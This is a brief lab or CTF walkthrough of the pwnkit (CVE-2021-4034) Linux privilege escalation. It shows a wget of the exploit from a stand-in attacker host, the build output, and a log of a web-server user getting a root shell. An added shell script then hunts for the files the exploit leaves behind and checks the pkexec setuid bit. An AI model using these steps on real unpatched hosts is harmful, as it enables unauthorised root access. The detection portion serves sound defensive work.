โ™Ÿ๏ธpwnkit CVE-2021-4034 Linux PrivEsc

First, download the zip of CVE-2021-4034 from GitHub.

Then:

$ wget http://attacker.thm:8000/pwnkit.zip

--[redacted]-- http://attacker.thm:8000/pwnkit.zip
Connecting to attacker.thm:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6457 (6.3K) [application/zip]
Saving to: 'pwnkit.zip'

0K ...... 100% 2.42M=0.003s

[redacted] (2.42 MB/s) - 'pwnkit.zip' saved [6457/6457]

$ unzip pwnkit.zip

Archive: pwnkit.zip
55d60e381ef90463ed35f47af44bf7e2fbc150d4
creating: CVE-2021-4034-main/
inflating: CVE-2021-4034-main/.gitignore
inflating: CVE-2021-4034-main/LICENSE
inflating: CVE-2021-4034-main/Makefile
inflating: CVE-2021-4034-main/README.md
inflating: CVE-2021-4034-main/cve-2021-4034.c
inflating: CVE-2021-4034-main/cve-2021-4034.sh
creating: CVE-2021-4034-main/dry-run/
inflating: CVE-2021-4034-main/dry-run/Makefile
inflating: CVE-2021-4034-main/dry-run/dry-run-cve-2021-4034.c
inflating: CVE-2021-4034-main/dry-run/pwnkit-dry-run.c
inflating: CVE-2021-4034-main/pwnkit.c

$ cd CVE-2021-4034-main/

$ pwd
/var/www/html/CVE-2021-4034-main

$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ ls
GCONV_PATH=.
LICENSE
Makefile
README.md
cve-2021-4034
cve-2021-4034.c
cve-2021-4034.sh
dry-run
gconv-modules
pwnkit.c
pwnkit.so

$ ./cve-2021-4034
# id
uid=0(root) gid=0(root) groups=0(root),33(www-dat
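
For defenders, the `make` output and `ls` listing above show what this build leaves on disk: a directory literally named `GCONV_PATH=.` and a `gconv-modules` file in the web root. The script below is an added example, not part of the original write-up or the repository it uses; the function names, the default pkexec path and the sample tree are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: hunt for the files the `make` step above leaves on disk.

# Print one line per artifact under the given directories; return 0 if any.
scan_pwnkit_artifacts() {
    hits=$(
        # `mkdir -p GCONV_PATH=.` creates a directory whose name starts with
        # "GCONV_PATH="; legitimate software has no reason to make one.
        find "$@" -type d -name 'GCONV_PATH=*' 2>/dev/null |
            sed 's/^/suspicious-dir  /'
        # Assumption: glibc's own gconv-modules sits in a directory named
        # "gconv"; a copy anywhere else (e.g. a web root) is worth a look.
        find "$@" -type f -name gconv-modules \
            ! -path '*/gconv/gconv-modules' 2>/dev/null |
            sed 's/^/stray-gconv-modules  /'
    )
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}

# Return 0 if pkexec (the setuid binary CVE-2021-4034 targets) still has
# its setuid bit. The default path is an assumption; pass another if needed.
pkexec_is_setuid() {
    [ -u "${1:-/usr/bin/pkexec}" ]
}

# Constructed sample tree mirroring the `ls` output above (empty files only).
make_sample_tree() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/html/CVE-2021-4034-main/GCONV_PATH=." "$d/lib/gconv"
    : > "$d/html/CVE-2021-4034-main/gconv-modules"
    : > "$d/lib/gconv/gconv-modules"   # stands in for glibc's own copy
    printf '%s\n' "$d"
}

# Demo on the constructed tree; on a real host pass e.g. /var/www /tmp.
sample=$(make_sample_tree)
scan_pwnkit_artifacts "$sample" || echo "no artifacts found"
pkexec_is_setuid && echo "pkexec is setuid: confirm polkit is patched"
rm -rf "$sample"
```

Where `pkexec_is_setuid` succeeds on a host without the fixed polkit package, updating polkit is the fix; clearing the setuid bit on pkexec was the interim mitigation published with the advisory.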
